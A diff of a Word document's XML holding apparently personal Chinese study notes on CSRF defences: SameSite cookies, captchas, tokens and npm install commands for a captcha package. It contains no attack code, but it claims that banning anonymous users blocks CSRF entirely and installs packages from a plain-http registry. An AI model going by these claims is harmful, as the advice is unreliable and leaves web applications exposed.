-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="6" name="图片 6"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId22"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5269230" cy="1304925"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln>
-                      <a:noFill/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>WebInspect/other/csrf.html</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
-      </w:pPr>
-      <w:r>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
-            <wp:extent cx="2667000" cy="1304925"/>
-            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
-            <wp:docPr id="8" name="图片 8"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="8" name="图片 8"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId23"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="2667000" cy="1304925"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln>
-                      <a:noFill/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>假如该网站禁止匿名用户，那么CSRF将完全被屏蔽。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>SameSite支持的浏览器</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:instrText xml:space="preserve"> HYPERLINK "https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie" </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="12"/>
-          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
-      </w:pPr>
-      <w:r>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
-            <wp:extent cx="5269865" cy="2907030"/>
-            <wp:effectExtent l="0" t="0" r="6985" b="7620"/>
-            <wp:docPr id="7" name="图片 7"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="7" name="图片 7"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId24"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5269865" cy="2907030"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln>
-                      <a:noFill/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>（2）不访问A网站的前端</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>·在前端页面加入验证信息；</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>·验证码；</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>·带token</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>npm install ccap --registry=http://registry.npm.taobao.org --save</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>npm install --global --production windows-build-tools</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-      </w:pPr>
-      <w:r>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
-            <wp:extent cx="5270500" cy="1422400"/>
-            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
-            <wp:docPr id="10" name="图片 10"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="10" name="图片 10"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId25"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5270500" cy="1422400"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln>
-                      <a:noFill/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>报如上错误，需要使用管理员权限打开cmd终端。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblStyle w:val="8"/>
-        <w:tblW w:w="8522" w:type="dxa"/>
-        <w:tblInd w:w="0" w:type="dxa"/>
-        <w:tblBorders>
-          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-          <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-          <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-        </w:tblBorders>
-        <w:tblLayout w:type="fixed"/>
-        <w:tblCellMar>
-          <w:left w:w="108" w:type="dxa"/>
-          <w:right w:w="108" w:type="dxa"/>
-        </w:tblCellMar>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="8522"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tblPrEx>
-          <w:tblBorders>
-            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-          </w:tblBorders>
-          <w:tblLayout w:type="fixed"/>
-        </w:tblPrEx>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="8522" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
                 <w:rFonts w:hint="default"/>
                 <w:vertAlign w:val="baseline"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-            <w:bookmarkEnd w:id="0"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>        }</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -15133,7 +18390,7 @@
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Acronym"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Address"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Cite"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Code"/>
+    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Code"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Definition"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Keyboard"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Preformatted"/>
@@ -15478,6 +18735,7 @@
   <w:style w:type="character" w:styleId="13">
     <w:name w:val="HTML Code"/>
     <w:basedOn w:val="9"/>
+    <w:qFormat/>
     <w:uiPriority w:val="0"/>
     <w:rPr>
       <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
